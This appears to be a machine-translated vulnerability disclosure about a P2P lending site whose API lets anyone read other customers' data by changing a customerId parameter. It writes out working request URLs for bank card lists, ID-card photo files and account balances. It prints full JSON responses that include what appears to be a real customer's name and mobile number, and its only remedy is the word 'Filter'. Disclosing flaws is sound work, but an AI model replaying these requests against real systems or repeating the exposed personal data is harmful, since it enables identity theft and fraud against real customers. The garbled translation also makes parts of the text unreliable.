P2P financial security means a real financial vulnerability can leak a large amount of user information (bank card number/phone number/ID Card Photo/balance query, etc)

P2P financial security means a real financial vulnerability can leak a large amount of user information (bank card number/phone number/ID Card Photo/balance query, etc)

 

All the information is available now. Is the withdrawal still a problem?

This should be the user id 14051005

#1. Bank Card number query

Traversal parameter customerId

Https://yizhenmoney.com: 9003/esb/account/customer/bankInfo/list? CustomerId = 14051005 &

#2. ID card photo Traversal

Here, it is difficult to traverse the image rules first. http: // 140.207.169.83: 8000/upload/attachment5/14051005/00150001/1432363081128.jpg

However, you only need to traverse the user ID to view the image information. I used burpsutie to extract it.

#

Https://yizhenmoney.com: 9003/esb/account/customer/cardInfo/audit? CustomerId = 14051005 &

This is the case after access
 

{  "success" : true,  "message" : "",  "attr" : {    "customerInfo" : {      "name" : null,      "cardId" : null,      "foreUrl" : "",      "foreThumbUrl" : "",      "backUrl" : "",      "backThumbUrl" : "",      "handUrl" : "",      "handThumbUrl" : "",      "status" : ""    },    "cardList" : [ {      "id" : 14098725,      "customerId" : 14051005,      "optSource" : null,      "autid" : 0,      "type" : "00150001",      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",      "subFilePath" : null,      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",      "status" : "00210001",      "version" : null,      "createDate" : null,      "creatorId" : null,      "modifyDate" : null,      "modifyerId" : null,      "remark" : null    }, {      "id" : 14098726,      "customerId" : 14051005,      "optSource" : null,      "autid" : 0,      "type" : "00150002",      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",      "subFilePath" : null,      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",      "status" : "00210001",      "version" : null,      "createDate" : null,      "creatorId" : null,      "modifyDate" : null,      "modifyerId" : null,      "remark" : null    }, {      "id" : 14098727,      "customerId" : 14051005,      "optSource" : null,      "autid" : 0,      "type" : "00150003",      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",      "subFilePath" : null,      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",      "status" : "00210001",      "version" : null,      "createDate" : null,      "creatorId" : null,      "modifyDate" : null,      "modifyerId" : null,      "remark" : null    } ]  }}

 

 

Http: // 140.207.169.83: 8000/upload/attachment5/14033105/00150001/1432291395569.jpg







#3. query the balance







Https://yizhenmoney.com: 9003/esb/fortune/customer/accountinfo? CustomerId = 14087605 &



# We can see 2800


 

{"Success": true, "message": "", "attr": {"customerAccVo": {"customerId": "14087605", "mobile": "13372530130 ", "cnName": "Cao jinfu", "recomCode": "w5dhx2", "status": "0", "avlBal": 0.0, "credAmount": 2800.0, "currPay": 0.0, "fortuneAmount": 0.0, "currProfit": 0.0, "redNum": 0, "recomProfits": 0.0, "withdrawStatus": "0 ", "myRecomPerson": null, "allNotRepayAmt": 0.0}, "surplusLuckNum": 0, "unReadMsgCount": 1 }}

 

Solution:

Filter